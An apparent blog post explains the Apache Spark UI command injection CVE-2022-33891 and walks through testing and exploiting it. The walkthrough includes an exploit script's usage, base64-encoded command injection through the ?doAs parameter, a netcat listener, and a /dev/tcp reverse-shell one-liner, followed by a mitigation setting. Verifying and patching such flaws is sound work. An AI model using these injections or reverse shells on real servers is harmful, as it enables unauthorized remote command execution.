Skip to main content



CVE-2022-33891 Apache Spark Command Injection Vulnerability

 

Please refer - https://spark.apache.org/security.html


  • The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command.
  • If an attacker is sending reverse shell commands using ?doAs. There is also a high chance of granting apache spark server access to the attackers’ machine.
Vulnerability description -

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.


Vulnerable component includes only Spark UI -
  • We tested Spark History Server, which worked fine when tested for vulnerability i.e. no Vulnerability
    • https://<SparkServer>:18081/
  • We tested Spark UI, starting Job using YARN master, which also worked fine for us i.e. no Vulnerability
    • https://<SparkServer>:8090/proxy/application_1684801301953_15767/
    • https://<SparkServer>:4043/
  • We tested Spark UI, starting Job with Local master, and it tested positive for Vulnerability i.e. we were able to do command line injection and execute shell commands on Spark server using remote machine.
    • https://<SparkServer>:4044/


  • Please create clone of above git repository.
  • Install python3 and following required libraries for the script - requests, argparse, colorama

  • Start Spark-Shell with --master local on one your machine in Hadoop Cluster. This will start Spark UI with web URL like -  https://<SparkServer>:4044/
  • Let’s check if this target (https://<SparkServer>:4044/) is vulnerable or not using below mentioned command - 
    • python3 exploit.py -u http://<Spark Server> -p 4044 --check --verbose
                  Note - Above command will append doAs paramter to URL and invoke same -  
      • http://<Spark Server>:4044/?doAs='testing'
      • http://<Spark Server>:4044/?doAs=`echo c2xlZXAgMTA=  | base64 -d | bash`
    • How this script verifies for Vulnerability is by calling above two URL's
      • The first URL invocation tells if URL supports ?doAs request parameter substitution.
      • If ?doAs is not supported then there can not be command line injection. Hence we are safe.
      • Second, it checks to see if we can execute "Sleep 10 " command on remote server. If it does sleep for 10 seconds means remote server is vulnerable else it is not.
  • Above command will tell you if above URL probably vulnerable or not.
  • Let’s use our exploit to get the reverse shell started to execute unix command on server from remote. But, before that start netcat listener to capture traffic for reverse shell using below mentioned command on some remote machine other then Spark Server. 
    • nc -nvlp 9002
  • Let's use  exploit command to start reverse shell.
    • python3 exploit.py -u http://<Spark Server> -p 4044 --revshell -lh <IP_OF_REMOTE_MACHINE_RUNNING_NETCAT> -lp 9002 --verbose
    • Above command Open's a interactive shell on Spark Server redirecting or lisntening to traffic from remote netcat machine. Ex: 
      • sh -i >& /dev/tcp/{IP_OF_REMOTE_MACHINE_RUNNING_NETCAT}/9002 0>&1
  • After this you should see Unix Shell on machine which was running netcat. On this machine you can execute you unix shell commands which will actually execute on remote Spark Server.
    • whoami
    • hostname

To mitigate the issue-
  • Cloudera Suggests to disable following properties (, if enabled)
    • spark.history.ui.acls.enable / spark.acls.enable
                        

Comments

Popular posts

Spring MongoDB Rename field with derived Value of another field

Input Collection -  [ { 'k' : 'Troubleshooting' , 'hour' : '2024-10-10T16' , 'v' : [ 'WebPage, Login' ] }, { 'k' : 'TroubleshootingMe' , 'hour' : '2024-10-07T01' , 'v' : [ 'Accounts, etc' ] }  ] Expected Output -  [ { 'hour' : '2024-10-10T16' , 'Troubleshooting' : [ 'WebPage, Login' ] }, { 'hour' : '2024-10-07T01' , 'TroubleshootingMe' : [ 'Accounts, etc' ] }  ]   Above Can be achieved by  $replaceRoot / $replaceWith as follows - { $replaceWith : { $mergeObjects : [ { hour : "$hour" }, { "$arrayToObject" : [ [ { k : "$k" , v : "$v" } ] ] } ] } } or { $replaceRoo...




What is Leadership

 




Spark Error - missing part 0 of the schema, 2 parts are expected

 Exception -  Caused by: org.apache.spark.sql.AnalysisException : Could not read schema from the hive metastore because it is corrupted. (missing part 0 of the schema, 2 parts are expected).; Analysis -  ·          Check for table definition. In TBLProperties, you might find something like this – > spark.sql.sources.schema.numPartCols > 'spark.sql.sources.schema.numParts' 'spark.sql.sources.schema.part.0' > 'spark.sql.sources.schema.part.1' 'spark.sql.sources.schema.part.2' > 'spark.sql.sources.schema.partCol.0' > 'spark.sql.sources.schema.partCol.1' That’s what error seems to say that part1 is defined but part0 is missing.  Solution -  Drop & re-create table. If Table was partitioned  then all partitions  would have been removed. So do either of below -  ·          Msck repair table <db_name>.<table_name> ·    ...




Spark MongoDB Connector Not leading to correct count or data while reading

  We are using Scala 2.11 , Spark 2.4 and Spark MongoDB Connector 2.4.4 Use Case 1 - We wanted to read a Shareded Mongo Collection and copy its data to another Mongo Collection. We noticed that after Spark Job successful completion. Output MongoDB did not had many records. Use Case 2 -  We read a MongoDB collection and doing count on dataframe lead to different count on each execution. Analysis,  We realized that MongoDB Spark Connector is missing data on bulk read as a dataframe. We tried various partitioner, listed on page -  https://www.mongodb.com/docs/spark-connector/v2.4/configuration/  But, none of them worked for us. Finally, we tried  MongoShardedPartitioner  this lead to constant count on each execution. But, it was greater than the actual count of records on the collection. This seems to be limitation with MongoDB Spark Connector. But,  MongoShardedPartitioner  seemed closest possible solution to this kind of situation. But, it per...




Read from a hive table and write back to it using spark sql

In context to Spark 2.2 - if we read from an hive table and write to same, we get following exception- scala > dy . write . mode ( "overwrite" ). insertInto ( "incremental.test2" ) org . apache . spark . sql . AnalysisException : Cannot insert overwrite into table that is also being read from .; org . apache . spark . sql . AnalysisException : Cannot insert overwrite into table that is also being read from .; 1. This error means that our process is reading from same table and writing to same table. 2. Normally, this should work as process writes to directory .hiveStaging... 3. This error occurs in case of saveAsTable method, as it overwrites entire table instead of individual partitions. 4. This error should not occur with insertInto method, as it overwrites partitions not the table. 5. A reason why this happening is because Hive table has following Spark TBLProperties in its definition. This problem will solve for insertInto met...